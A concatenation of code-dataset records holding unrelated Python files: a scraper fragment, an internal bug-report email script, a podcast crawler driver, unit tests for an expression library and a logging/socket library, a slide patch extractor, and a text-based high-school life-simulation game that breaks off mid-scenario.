list(), list(), list(), list(), int()\n count = len(soup.select(\"div.three:nth-of-type(3) a\"))\n for j in range(1,count+1):\n for link in soup.select(\"div.three:nth-of-type(3) li:nth-of-type(\"+str(j)+\") a\"):\n data = (link['href'])\n links.append(data)\n data_text = link.text.strip().replace(\"\\n\",\"\")\n link_text.append(data_text)\n credit_ratings = dict(zip(link_text, links))\n\n data = {'statements':statements, 'annual_reports':annual_reports, 'credit_ratings':credit_ratings}\n return data\n else:\n msg = {'info':'length of script_code should be 6 digit'}\n return msg\n except:\n msg = {'info' : 'Error'}\n return 
msg\n","sub_path":"bselib/statements.py","file_name":"statements.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"473492595","text":"import xlrd\nimport re\nimport os\nimport xlwt\nfrom xlutils.copy import copy\nfrom collections import defaultdict\nfrom smtplib import SMTP\nfrom email.mime.text import MIMEText # constructing messages\nfrom jinja2 import Environment # Jinja2 templating\n\nworkbook = xlrd.open_workbook(\"BUG LEAK ANALYSISbackup.xlsx\")\nworksheet = workbook.sheet_by_name(\"Sheet1\")\nwb = copy(workbook)\nsheet = wb.get_sheet(0)\nlist_of_ddts = []\nlist_of_components = []\nlist_of_headlines = []\n\n\nfor i in range(worksheet.nrows):\n list_of_ddts.append(worksheet.cell_value(i, 0))\nfor j in range(worksheet.nrows):\n list_of_components.append(worksheet.cell_value(j, 2))\nfor k in range(worksheet.nrows):\n list_of_headlines.append(worksheet.cell_value(k, 6))\nlist_of_ddts_id = list_of_ddts[1:]\nlist_of_components_final = list_of_components[1:]\nlist_of_headlines_final = list_of_headlines[1:]\nfor i in range(worksheet.nrows - 1):\n k = i + 1\n print(k)\n j = os.popen(\"/usr/cisco/bin/findcr -D '' -i \" + worksheet.cell_value(k, 0) + \" -w DTPT-manager\").read().split('\\n')[0]\n if j:\n sheet.write(k, 8, j)\n else:\n component = worksheet.cell_value(k, 2)\n null = None\n cmd = ''' /usr/cisco/bin/pims gsr -report comp_access_control -cdets_name {} -format json'''.format(component)\n js = os.popen(cmd).read()\n if (re.search(r\"\\\"dtpt_mgr\\\": \\\"(\\w+)\\\"\", js)):\n dtmgr = re.search(r\"\\\"dtpt_mgr\\\": \\\"(\\w+)\\\"\", js).group(1)\n else:\n dtmgr = \"mnamasev\"\n sheet.write(k, 8, dtmgr)\n\nsheet.write(0, 8, 'Test Mgr')\nwb.save('final_workbook.xlsx')\n\nworkbook_final = xlrd.open_workbook(\"final_workbook.xlsx\")\nsheet = workbook_final.sheet_by_name(\"Sheet1\")\nlist_of_test_mgrs = []\nfor m in range(sheet.nrows):\n list_of_test_mgrs.append(sheet.cell_value(m, 8))\nlist_of_test_mgrs_final = list_of_test_mgrs[1:]\n\nl3 = zip(list_of_test_mgrs_final, list_of_ddts_id, list_of_components_final, list_of_headlines_final)\nfinal_list = list(l3)\ndic = defaultdict(list)\nfor manager, bug, component, headline in final_list:\n dic[manager].append(bug)\n dic[manager].append(component)\n dic[manager].append(headline)\nfor k, v in dic.items():\n final_list2 = []\n for i in range(0, len(v), 3):\n final_list2.append(v[i:i + 3])\n for x in final_list2:\n if (re.search(r\"[Cc]losed?\",(os.popen(\"/usr/cisco/bin/findcr -D '' -i \" + x[0] + \" -w Attribute\").read().split('\\n')[0]))):\n final_list2.remove(x)\n print(final_list2)\n TEMPLATE = \"\"\"\n \n \n Bug Leak Report\n \n \n \n

Hi,<br>\n<br>\nPlease Take corrective actions on the bugs on your name listed below:-<br>\n<br>\nAdd attribute \"closed\" after the action is successfully taken to avoid further mails on that particular bug<br>\n<table border=\"1\">\n<tr>\n<th>Bug Id</th>\n<th>Component</th>\n<th>Headline</th>\n</tr>\n{% for item in list2 %}\n<tr>\n<td>{{ item[0] }}</td>\n<td>{{ item[1] }}</td>\n<td>{{ item[2] }}</td>\n</tr>\n{% endfor %}\n</table>\n<br>\nPlease don't reply to this email. For feedback please send email to Manjusha(mnamasev)<br>\n<br>\nThanks,<br>\nNFT TEAM<br>
\n \n \n \"\"\"\n # Create a text/html message from a rendered template\n if final_list2:\n msg = MIMEText(\n Environment().from_string(TEMPLATE).render(\n list2=final_list2\n ), \"html\"\n )\n subject = \"NFT To SIT Bug Leak Report- Corrective actions to be taken\"\n sender = \"nft-to-sit-bug-leak-report@cisco.com\"\n #recipient = k + '@cisco.com'\n recipient = ['ikyalnoo@cisco.com','mnamasev@cisco.com']\n msg['Subject'] = \"NFT To SIT Bug Leak Report- Corrective actions to be taken\"\n msg['From'] = \"nft-to-sit-bug-leak-report@cisco.com\"\n #msg['To'] = k + '@cisco.com'\n msg ['To'] = 'ikyalnoo@cisco.com'\n print(sender)\n print(k)\n print(recipient)\n\n # Send the message via our own local SMTP server.\n s = SMTP('outbound.cisco.com')\n s.sendmail(sender, recipient, msg.as_string())\n s.quit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"509942987","text":"from site_crawler import SiteCrawler\nfrom series_worker import SeriesWorker\n\nclass SeriesDriver(object):\n \"\"\"\n Drives the acquisition of series +\n their subsequent storage in `directory`\n \"\"\"\n\n def __init__(self, directory):\n \"\"\"Constructor\"\"\"\n self.directory = directory\n\n def get_series_from_urls(self, urls):\n \"\"\"\n Get most popular series - `urls` = genre URLs\n \"\"\"\n # Threads dispatched\n threads = []\n for i in xrange(0, 10):\n t = SeriesWorker(self.directory, urls, i)\n threads.append(t)\n t.start()\n\n # Get them threads together\n for t in threads:\n t.join()\n","sub_path":"podcasts/series_driver.py","file_name":"series_driver.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"66378633","text":"# -*- coding: utf-8 -*-\nimport unittest\nimport copy\nfrom common.finder.interpret import LexicalAnalyser\nfrom common.finder.literal import TreeMatcher\nfrom common.finder.expression import SequenceExp, AlternationExp, NegativeExp, LiteralExp\n\n\nclass LiteralExpTestCase(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.a = LiteralExp('a')\n\t\tself.b = LiteralExp('b')\n\t\tself.ab = LiteralExp(['a', 'b'])\n\n\tdef test_eval(self):\n\t\tself.assertTrue(self.a.eval('test a'))\n\t\tself.assertTrue(self.ab.eval('test b'))\n\t\tself.assertFalse(self.ab.eval('test c'))\n\n\tdef test_merge(self):\n\t\tmeg = LiteralExp.merge([self.a, self.b])\n\t\tself.assertTrue(meg.eval(\"test a\"))\n\t\tself.assertTrue(meg.eval(\"test b\"))\n\n\nclass SequenceExpTestCase(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.a = LiteralExp('a')\n\t\tself.b = LiteralExp('b')\n\t\tself.ab = LiteralExp(['a', 'b'])\n\t\tself.seq = SequenceExp([self.a, self.b])\n\n\tdef test_eval(self):\n\t\tself.assertTrue(self.seq.eval(\"a and b\"))\n\t\tself.assertFalse(self.seq.eval(\"a and c\"))\n\n\tdef test_prune(self):\n\t\torigin = copy.deepcopy(self.seq)\n\t\tpruned = self.seq.prune()\n\t\tself.assertEqual(pruned, self.seq)\n\t\tself.assertEqual(origin.eval('test ab'), pruned.eval('test ab'))\n\t\tself.assertEqual(origin.eval('test a'), pruned.eval('test a'))\n\n\tdef test_prune_all_seq(self):\n\t\tc = LiteralExp('c')\n\t\td = LiteralExp('d')\n\t\tseq2 = SequenceExp([c, d])\n\t\tseq_of_seqs = SequenceExp([self.seq, seq2])\n\n\t\torigin = copy.deepcopy(seq_of_seqs)\n\t\tpruned = seq_of_seqs.prune()\n\t\tself.assertNotEqual(origin, 
pruned)\n\t\tself.assertEqual(origin.eval('test abcd'), pruned.eval('test abcd'))\n\t\tself.assertEqual(origin.eval('test ac'), pruned.eval('test ac'))\n\t\tself.assertEqual(origin.eval('test ab'), pruned.eval('test ab'))\n\t\tself.assertEqual(origin.eval('test a'), pruned.eval('test a'))\n\n\nclass AlternationExpTestCase(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.a = LiteralExp('a')\n\t\tself.b = LiteralExp('b')\n\t\tself.c = LiteralExp('c')\n\t\tself.d = LiteralExp('d')\n\t\tself.seq = SequenceExp([self.a, self.b])\n\t\tself.ab = LiteralExp(['a', 'b'])\n\t\tself.alt = AlternationExp([self.a, self.b])\n\t\tself.alt_seq = AlternationExp([self.seq, self.c])\n\n\tdef test_eval(self):\n\t\tself.assertTrue(self.alt.eval(\"a or c\"))\n\t\tself.assertFalse(self.alt.eval(\"d or c\"))\n\n\t\tself.assertFalse(self.alt_seq.eval(\"a test\"))\n\t\tself.assertTrue(self.alt_seq.eval(\"a b test\"))\n\t\tself.assertTrue(self.alt_seq.eval(\"test c\"))\n\t\tself.assertFalse(self.alt_seq.eval(\"test d\"))\n\n\tdef test_prune(self):\n\t\t# able to prune\n\t\tpruned_alt = self.alt.prune()\n\t\tself.assertEqual(pruned_alt.__class__, LiteralExp)\n\t\tself.assertEqual(pruned_alt.data, ['a', 'b'])\n\n\t\t# impossible to prune\n\t\tpruned_alt_seq = self.alt_seq.prune()\n\t\tself.assertEqual(pruned_alt_seq.__class__, AlternationExp)\n\t\tself.assertEqual(pruned_alt_seq, self.alt_seq)\n\n\n\tdef test_prune_symmetric(self):\n\t\t# merge to one\n\t\talt_alts = AlternationExp([self.alt, AlternationExp([self.c, self.d])])\n\t\tpruned_alt_alts = alt_alts.prune()\n\t\tself.assertEqual(pruned_alt_alts.__class__, LiteralExp)\n\t\tself.assertEqual(pruned_alt_alts.data, list(set(['a', 'b', 'c', 'd'])))\n\t\n\n\tdef test_prune_unsymmetric(self):\n\t\talt_alt_lit = AlternationExp([self.alt, self.ab])\n\t\tpruned_alt_alt_lit = alt_alt_lit.prune()\n\t\tself.assertEqual(pruned_alt_alt_lit.data, ['a', 'b'])\n\n\nclass NegativeExpTestCase(unittest.TestCase):\n\tdef setUp(self):\n\t\ta = LiteralExp('a')\n\t\tb = LiteralExp('b')\n\t\talt = AlternationExp([a, b])\n\t\tseq = SequenceExp([a, b])\n\t\tself.neg_seq = NegativeExp(seq)\n\n\tdef test_eval(self):\n\t\tself.assertFalse(self.neg_seq.eval(\"a and b\"))\n\t\tself.assertTrue(self.neg_seq.eval(\"a and c\"))\n\t\t","sub_path":"src/tests/common/finder/test_expression.py","file_name":"test_expression.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501386211","text":"\nimport openslide\nimport numpy as np\nimport glob\nimport os\nimport argparse\nfrom multiprocessing import Pool, Process\nimport multiprocessing\nimport itertools\nimport threading\n\n\nparser = argparse.ArgumentParser(description='Process args for patch extraction')\nparser.add_argument(\"--root_dir\", type=str, required=True, help=\"Root directory\")\nparser.add_argument(\"--dest_dir\", type=str, required=True, help=\"Destination directory\")\nparser.add_argument(\"--level\", type=int, default=1, help=\"0 means 40x, 1 means 20x\")\nparser.add_argument(\"--patch_size\", type=int, default=512, help=\"Patch Size\")\nparser.add_argument(\"--whiteness_limit\", type=int, default=210, help=\"Whiteness Limit\")\nparser.add_argument(\"--blackness_limit\", type=int, default=5, help=\"Blackness Limit\")\nparser.add_argument(\"--max_faulty_pixels\", type=int, default=160000, help=\"Max allowed # of only B/W pixels\")\n\n\ndef valid_slide(slide, level, blackness_limit):\n # tests if a random patch is full black (as a proxy test 
for full black slides)\n try:\n test_patch = slide.read_region(location=(100, 100), level=level, size=(100, 100)).convert('RGB')\n except:\n return False\n arr = np.array(test_patch)\n if np.all(arr=1 and grade<=9:\n label = \"cancer\"\n elif grade>=10 and grade<=19:\n label = \"normal\"\n elif grade >=20:\n label = \"control\"\n if not os.path.exists(os.path.join(dest_dir, label, slide_id)):\n os.makedirs(os.path.join(dest_dir, label, slide_id))\n\n level = len(slide.level_downsamples)-1 # select highest possible level\n\n def reject_or_save_patch(x, y):\n patch = slide.read_region(location=(x,y), level=level, size=(patch_size, patch_size)).convert('RGB')\n arr = np.array(patch)\n is_white = np.all([arr[:,:,i]>whiteness_limit for i in range(3)], axis=0)\n is_black = np.all([arr[:,:,i]max_faulty_pixels:\n return\n patch.save(os.path.join(dest_dir, label, slide_id, \"{}_X_{}_Y_{}.png\".format(filename[:-4], x, y)))\n\n width, height = slide.dimensions\n\n # # TODO: 4* signifies downsample ie slide.level_downsamples[1]\n # threads=[]\n # for x in range(0, width, 4*patch_size//2):\n # for y in range(0, height, 4*patch_size//2):\n # if x==0 or y==0 or x+4*patch_size>width or y+4*patch_size>height:\n # continue\n # t = threading.Thread(target=reject_or_save_patch, args=(x, y))\n # threads.append(t)\n # thread_groups = [threads[i*5:(i+1)*5] for i in range(len(threads)//5+1)]\n # for grp in thread_groups:\n # for t in grp:\n # t.start()\n # for t in grp:\n # t.join()\n\n for x in range(0, width, 4*patch_size//2):\n for y in range(0, height, 4*patch_size//2):\n if x==0 or y==0 or x+4*patch_size>width or y+4*patch_size>height:\n continue\n reject_or_save_patch(x, y)\n slide.close()\n print(\"Slide {} Done.\".format(slide_file), flush=True)\n\n\ndef main():\n args = parser.parse_args()\n root_dir = args.root_dir\n dest_dir = args.dest_dir\n level = args.level\n patch_size = args.patch_size\n whiteness_limit = args.whiteness_limit\n blackness_limit = args.blackness_limit\n max_faulty_pixels = args.max_faulty_pixels\n\n ## TODO: change this if your storage format is different\n slide_files = glob.glob(\"{}/*/*/*.svs\".format(root_dir))\n\n for label in [\"cancer\", \"normal\", \"control\"]:\n if not os.path.exists(os.path.join(dest_dir, label)):\n os.makedirs(os.path.join(dest_dir, label))\n\n pool = Pool(multiprocessing.cpu_count())\n paramlist = list(itertools.product(slide_files,[level],[patch_size],[whiteness_limit],\\\n [blackness_limit], [max_faulty_pixels], [dest_dir]))\n pool.map(create_patches, paramlist)\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"old/extract_patches.py","file_name":"extract_patches.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"317006017","text":"import time\nimport unittest\n\nimport director\n\nfrom director import tests\n\n\nclass TestLogger(unittest.TestCase):\n def setUp(self):\n self.log = director.LogSetup()\n\n self.uid_patched = unittest.mock.patch(\"director.os.getuid\")\n self.uid = self.uid_patched.start()\n\n self.env_patched = unittest.mock.patch(\"director.os.path.expanduser\")\n self.env = self.env_patched.start()\n\n self.idr_patched = unittest.mock.patch(\"director.os.path.isdir\")\n self.idr = self.idr_patched.start()\n\n self.stat_patched = unittest.mock.patch(\"director.os.stat\")\n self.stat = self.stat_patched.start()\n\n def tearDown(self):\n self.uid_patched.stop()\n self.env_patched.stop()\n self.idr_patched.stop()\n\n def 
test_logger_max_backup(self):\n self.assertEqual(self.log.max_backup, 5)\n\n def test_logger_max_size(self):\n self.assertEqual(self.log.max_size, 524288000)\n\n def test_logger_debug_logging(self):\n self.assertEqual(self.log.debug_logging, False)\n\n def test_logger_override_backup(self):\n log = director.LogSetup(max_backup=10)\n self.assertEqual(log.max_backup, 10)\n\n def test_logger_override_max_backup(self):\n log = director.LogSetup(max_backup=10)\n self.assertEqual(log.max_backup, 10)\n\n def test_logger_override_max_size(self):\n log = director.LogSetup(max_size=10)\n self.assertEqual(log.max_size, 10485760)\n\n def test_logger_debug_logging_enabled(self):\n log = director.LogSetup(debug_logging=True)\n self.assertEqual(log.debug_logging, True)\n\n def test_logger_return_logfile_not_root_new_log_dir(self):\n self.uid.return_value = 99\n self.env.return_value = \"/home/TestUser\"\n self.idr.return_value = False\n self.stat.return_value = tests.FakeStat(uid=99, gid=99)\n logfile = self.log.return_logfile(\n filename=\"test_file\", log_dir=\"/other\"\n )\n self.assertEqual(logfile, \"/home/TestUser/test_file\")\n\n def test_logger_return_logfile_root_new_log_dir(self):\n self.uid.return_value = 0\n self.env.return_value = \"/root\"\n self.idr.return_value = True\n self.stat.return_value = tests.FakeStat(uid=0, gid=0)\n logfile = self.log.return_logfile(\n filename=\"test_file\", log_dir=\"/other\"\n )\n self.assertEqual(logfile, \"/other/test_file\")\n\n def test_logger_return_logfile_not_root(self):\n self.uid.return_value = 99\n self.env.return_value = \"/home/TestUser\"\n self.stat.return_value = tests.FakeStat(uid=0, gid=0)\n logfile = self.log.return_logfile(filename=\"test_file\")\n self.assertEqual(logfile, \"/home/TestUser/test_file\")\n\n def test_logger_return_logfile_root(self):\n self.uid.return_value = 0\n self.env.return_value = \"/root\"\n self.idr.return_value = True\n self.stat.return_value = tests.FakeStat(uid=0, gid=0)\n logfile = self.log.return_logfile(filename=\"test_file\")\n self.assertEqual(logfile, \"/var/log/test_file\")\n\n def test_logger_return_logfile_root_log_dir_not_found(self):\n self.uid.return_value = 0\n self.env.return_value = \"/root\"\n self.idr.return_value = False\n logfile = self.log.return_logfile(\n filename=\"test_file\", log_dir=\"/other\"\n )\n self.assertEqual(logfile, \"/root/test_file\")\n\n\nclass TestLoggerHandlers(unittest.TestCase):\n def setUp(self):\n\n self.rh_patched = unittest.mock.patch(\n \"director.handlers.RotatingFileHandler\"\n )\n self.rh = self.rh_patched.start()\n\n self.sh_patched = unittest.mock.patch(\"director.logging.StreamHandler\")\n self.sh = self.sh_patched.start()\n\n self.log = director.LogSetup()\n\n self._log = unittest.mock.Mock()\n self._handler = unittest.mock.Mock()\n\n def tearDown(self):\n self.rh_patched.stop()\n self.sh_patched.stop()\n\n def test_getlogger_new_logger(self):\n log = director.getLogger(name=\"testLogger\")\n for handler in log.handlers:\n return self.assertTrue(handler.name == \"testLogger\")\n else:\n self.fail(\"The log handler name was not set\")\n\n def test_logger_default_logger(self):\n self.log.format = \"%(test)s\"\n self.log.default_logger(\n name=\"test_log\", enable_file=False, enable_stream=False\n )\n self.assertEqual(self.log.format, \"%(test)s\")\n\n def test_logger_enable_file(self):\n self.log.default_logger(\n name=\"test_log\", enable_file=True, enable_stream=False\n )\n self.assertTrue(self.rh.called)\n self.assertFalse(self.sh.called)\n\n def 
test_logger_enable_stream(self):\n self.log.default_logger(\n name=\"test_log\", enable_file=False, enable_stream=True\n )\n self.assertFalse(self.rh.called)\n self.assertTrue(self.sh.called)\n\n def test_logger_enable_stream_enable_file(self):\n self.log.default_logger(\n name=\"test_log\", enable_file=True, enable_stream=True\n )\n self.assertTrue(self.rh.called)\n self.assertTrue(self.sh.called)\n\n def test_logger_set_handler(self):\n self.log.set_handler(log=self._log, handler=self._handler)\n self.assertTrue(self._log.setLevel.called)\n self.assertTrue(self._handler.setFormatter.called)\n self.assertTrue(self._log.addHandler.called)\n\n\nclass TestProcessor(unittest.TestCase):\n def setUp(self):\n self.log_patched = unittest.mock.patch(\"director.getLogger\")\n self.log = self.log_patched.start()\n self.processor = director.Processor()\n\n def tearDown(self):\n self.log_patched.stop()\n\n def test_wq_prune_0(self):\n workers = self.processor.wq_prune(workers={})\n self.assertDictEqual(workers, dict())\n self.log.debug.called_once()\n\n def test_wq_prune_valid(self):\n workers = self.processor.wq_prune(\n workers={\n \"valid1\": time.time() + 2,\n \"invalid1\": time.time() - 2,\n \"invalid2\": time.time() - 3,\n }\n )\n self.assertEqual(len(workers), 1)\n self.assertIn(\"valid1\", workers)\n self.log.debug.called_once()\n\n def test_wq_empty(self):\n self.processor.workers[\"valid1\"] = (time.time() + 2,)\n self.processor.workers[\"invalid1\"] = (time.time() - 2,)\n self.processor.workers[\"invalid2\"] = time.time() - 3\n self.assertEqual(len(self.processor.workers), 3)\n self.processor.wq_empty(workers=self.processor.workers)\n self.assertEqual(len(self.processor.workers), 0)\n\n def test_read_in_chunks(self):\n chunks = list()\n with unittest.mock.patch(\n \"builtins.open\", unittest.mock.mock_open(read_data=\"data\")\n ) as mock_file:\n with open(mock_file) as f:\n for d in self.processor.read_in_chunks(file_object=f):\n chunks.append(d)\n self.log.debug.called_once()\n self.assertListEqual(chunks, [\"data\"])\n\n def test_read_in_chunks_set_chunk(self):\n chunks = list()\n with unittest.mock.patch(\n \"builtins.open\", unittest.mock.mock_open(read_data=\"data\")\n ) as mock_file:\n with open(mock_file) as f:\n for d in self.processor.read_in_chunks(\n file_object=f, chunk_size=1\n ):\n chunks.append(d)\n self.log.debug.called_once()\n self.assertListEqual(chunks, [\"d\", \"a\", \"t\", \"a\"])\n\n def test_file_sha1(self):\n with unittest.mock.patch(\n \"builtins.open\", unittest.mock.mock_open(read_data=b\"data\")\n ) as mock_file:\n sha1 = self.processor.file_sha1(file_path=mock_file)\n self.assertEqual(sha1, \"a17c9aaa61e80a1bf71d0d850af4e5baa9800bbd\")\n\n def test_file_sha1_set_chunk(self):\n with unittest.mock.patch(\n \"builtins.open\", unittest.mock.mock_open(read_data=b\"data\")\n ) as mock_file:\n sha1 = self.processor.file_sha1(file_path=mock_file, chunk_size=1)\n self.assertEqual(sha1, \"a17c9aaa61e80a1bf71d0d850af4e5baa9800bbd\")\n\n def test_object_sha1(self):\n sha1 = self.processor.object_sha1(obj={\"test\": \"value\"})\n self.assertEqual(sha1, \"4e0b1f3b9b1e08306ab4e388a65847c73a902097\")\n\n\nclass TestUnixSocket(unittest.TestCase):\n def setUp(self):\n self.socket_patched = unittest.mock.patch(\"director.socket.socket\")\n self.socket = self.socket_patched.start()\n\n def tearDown(self):\n self.socket_patched.stop()\n\n def test_unix_socket(self):\n with director.UNIXSocketConnect(sock_path=\"/test.sock\") as c:\n 
c.connect.assert_called_once_with(\"/test.sock\")\n c.close.assert_called_once()\n self.socket.assert_called_once_with(\n director.socket.AF_UNIX, director.socket.SOCK_STREAM\n )\n","sub_path":"director/tests/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":8999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"143829987","text":"import random\n \nhappiness = random.randint(25,100)\nhealth = random.randint(25,100)\nsmarts = random.randint(25,100)\nlooks = random.randint(25,100)\ndeath_chance= 200\npossible_genders = [\"male\",\"female\",\"alien\"]\ngender= random.choice(possible_genders)\ncompleted_scenarios = []\ntimes_studied = []\ntimes_workedout = []\n\nclass Person:\n def __init__(self,name,status,month_display,month_total,grade,gender,popularity,happiness,health,smarts,looks):\n self.name = name\n self.status = status\n self.month_display = month_display\n self.month_total = month_total\n self.grade= grade\n self.gender = gender\n self.popularity = popularity\n self.happiness = happiness\n self.health = health\n self.smarts = smarts \n self.looks = looks\n \n def introduce(self):\n print(f\"Welcome {self.name} to your first day of 9th grade. You were born {self.gender}.\")\n\n def stats(self):\n print(f\"Grade: {self.grade} \\nMonth: {self.month_display} \\n\\n Stats:\\n Popularity: {self.popularity} \\n Happiness: {self.happiness} \\n Health: {self.health} \\n Smarts: {self.smarts} \\n Looks: {self.looks} \\n\")\n \n def month_up(self):\n self.month_display += 1\n self.month_total += 1\n\n def school_scenarios(self):\n global completed_scenarios\n \n if self.grade == 9:\n while True:\n scenario = random.randint(1,6)\n if scenario not in completed_scenarios:\n break\n if scenario == 1:\n if 1 not in completed_scenarios:\n completed_scenarios.append(1)\n while True:\n x = input(\"A bully wants to take your lunch. \\n What will you do? \\n \\n a= punch the bully \\n b= give the bully your lunch \\n c = run away \\n\")\n if x == 'a':\n fight = random.randint(1,2)\n if fight == 1:\n print(\"You got beat up\")\n self.health -= 10\n print(\"OOF that one hurt. Your health just went down ten points\")\n break\n if fight == 2:\n print(\"You won\")\n self.happiness += 10\n print(\"Congrats you surprisingly won! Your happiness went up 10 points\")\n break\n elif x == 'b':\n self.happiness -= 10\n print(\"That one was a blow to your self esteem. Your happiness went down 10 points\")\n break\n elif x == 'c':\n self.smarts += 5\n print(\"Finally, you did something intelligent. Your smarts went up 5 points\")\n break\n else:\n print(\"Error\")\n \n elif scenario == 2:\n if 2 not in completed_scenarios:\n completed_scenarios.append(2)\n while True:\n x = input(\"You are assigned a group project from your freshman technology teacher. What are you going to do? \\n \\n a= do all the work \\n b= do none of the work \\n c= split up the work evenly \\n\")\n if x == 'a':\n self.smarts += 10\n print(\"Congrats try hard. Your now THAT kid, but hey your smarts went up 10 points\")\n break\n elif x == 'b':\n self.popularity -= 10\n print(\"Ew. Now your THAT kid. No one likes you so you lost 10 popularity points\")\n break\n elif x == 'c':\n self.popularity += 5\n print(\"You're chill with your groupmates now. 
You gained 5 popularity points\")\n break\n else:\n print(\"Error\")\n \n elif scenario == 3:\n if 3 not in completed_scenarios:\n completed_scenarios.append(3)\n while True:\n x = input(\"Your mom is yelling at you for getting a bad grade in Dr. Gupta's freshman biology class. What is your next move? \\n \\n a= give up and cry \\n b= study harder \\n c= bribe the teacher \\n\")\n if x == 'a':\n self.happiness -= 10\n print(\"Since you are a sad, depressed, loser your happiness went down ten points\")\n break\n elif x == 'b':\n self.smarts += 10\n print(\"Wow! Good job! You actually made a good decision. Your smarts went up 10 points\")\n break\n elif x == 'c':\n self.smarts -= 10\n print(\"Nice try! But she failed you and gave you a fat 0. Your smarts went down 10 points.\")\n break\n else:\n print(\"Error\")\n elif scenario ==4:\n if 4 not in completed_scenarios:\n completed_scenarios.append(4)\n while True:\n x = input(\"You are on the way to school and you can't find your idea? What are you going to do? \\n \\n a= Take the L(OP) \\n b= Try to sneak into school without it \\n c= run back home \\n\")\n if x=='a':\n print(\"Well good job losng your ID bozo. It turns out that during your LOP they gave out free food in the cafeteria. You lost 10 points of happiness\")\n self.happiness -=10\n break\n if x=='b':\n print(\"You got caught trying to sneak into school. Now you have LOP for the whole week. You lost 20 points of happiness\")\n self.happiness -=20\n break\n if x =='c':\n print(\"You found your ID! One problem though you got back to school late, but who really cares about that. Happiness is up 10 points.\")\n self.happiness += 10\n break\n else:\n print(\"Error\")\n elif scenario ==5:\n if 5 not in completed_scenarios:\n completed_scenarios.append(5)\n while True:\n x = input(\"You are in the cafeteria, but you don't see any of your friends. What are you going to do? \\n a= eat lunch in the bathroom \\n b= make new friends \\n c= go talk to a teacher about something \\n \")\n if x=='a':\n print(\"Wow, you really are a loser. Someone saw you eating lunch on the toilet and told the whole school. Popularity down 10 points\")\n self.popularity -=10\n break\n if x=='b':\n print(\"Congrats you were social for once. You actually made some new friends. Popularity up 10 points\")\n self.popularity +=10\n break\n if x =='c':\n print(\"I mean this isn't that sad I guess. Good job for being a good student? Your smarts went up 5 points\")\n self.smarts +=5\n break\n else:\n print(\"Error\")\n elif scenario ==6:\n if 6 not in completed_scenarios:\n completed_scenarios.append(6)\n while True:\n x = input(\"So you are walking down the senior hallway and you see one of them trip you and then look at their friends and laugh. Whats your next move? \\n a= run away crying \\n b= make fun of the senior \\n c= don't say anything and do not make eye contact with anyone for the rest of the year \\n\") \n if x=='a':\n print(\"Are you kidding me? This is the saddest thing ever. Everything is going down 5 points\")\n self.health -= 5\n self.happiness -= 5\n self.popularity -= 5\n self.smarts -= 5\n self.looks -= 5\n break\n if x=='b':\n print(\"You made fun of the senior's ugly haircut causing all his friends to laugh. You gained their respect. Popularity up 10 points\")\n self.popularity += 10\n break\n if x =='c':\n print(\"Um. Ok I guess. This is weird. 
IDK what to do here so nothing is changing\")\n                            break\n                        else:\n                            print(\"Error\")\n\n        elif self.grade == 10:\n            while True:\n                scenario = random.randint(11,15)\n                if scenario not in completed_scenarios:\n                    break\n            if scenario ==11:\n                if 11 not in completed_scenarios:\n                    completed_scenarios.append(11)\n                    while True:\n                        x = input(\"It's time for the AutoCad Exam. Are you ready to take it? \\n a = yes \\n b= no \\n\")\n                        if x=='a':\n                            print(\"Congrats! You failed. We both know you were not ready! Your smarts went down 5 points for failing and another 5 points for being cocky.\")\n                            self.smarts -= 10\n                            break\n                        if x=='b':\n                            print(\"Congrats! You failed, but you knew you were going to so since you know yourself so well your smarts went up 10 points\")\n                            self.smarts += 10\n                            break\n                        else:\n                            print(\"Error\")\n            elif scenario ==12:\n                if 12 not in completed_scenarios:\n                    completed_scenarios.append(12)\n                    while True:\n                        x = input(\"As you were on your way to math class you trip and start falling down the stairs. What are you going to do? \\n a= try and catch yourself \\n b= let yourself fall \\n\")\n                        if x=='a':\n                            print(\"You only fell down three stairs before you caught yourself. Your friends laughed but there was no injury. Nothing happens\")\n                            break\n                        if x=='b':\n                            print(\"Um so you fell down both flights of stairs and got a black eye and bruised ego. Also, someone took a video and sent it to the whole school. Your popularity and looks went down 5 points\")\n                            self.popularity -= 5\n                            self.looks -= 5\n                            break\n                        else:\n                            print(\"Error\")\n            elif scenario ==13:\n                if 13 not in completed_scenarios:\n                    completed_scenarios.append(13)\n                    while True:\n                        x = input(\"So you went really hard in gym class and failed to notice your pit stains developing. It wasn't until after you changed and put on your school shirt that you saw the dark spots. What is your next move? \\n a= ask someone to borrow a shirt \\n b= walk around with pit stains \\n c= try drying off your shirt with the air dryer \\n\")\n                        if x=='a':\n                            print(\"One of your friends lends you their shirt but you still smell so your popularity went down 5 points\")\n                            self.popularity -= 5\n                            break\n                        if x=='b':\n                            print(\"Everyone saw your pit stains and tbh that's just nasty. Popularity down 100 points. There's no way you're coming back from that\")\n                            self.popularity -= 100\n                            break\n                        if x =='c':\n                            print(\"Nice job thinking on your feet. You got the dark spots to come off. Your smarts went up 10 points\")\n                            self.smarts += 10\n                            break\n                        else:\n                            print(\"Error\")\n            elif scenario ==14:\n                if 14 not in completed_scenarios:\n                    completed_scenarios.append(14)\n                    while True:\n                        x = input(\"You are walking down the hallway and stop to tie your shoe. A group of annoying freshman then proceed to trample you. What are you doing? \\n a = hunt every single one of them down and ... \\n b= yell at them \\n c= get over yourself \\n\")\n                        if x=='a':\n                            print(\"Um I am now concerned but the police found out your plans because I informed them and they killed you\")\n                            self.status = \"ded\"\n                            break\n                        if x=='b':\n          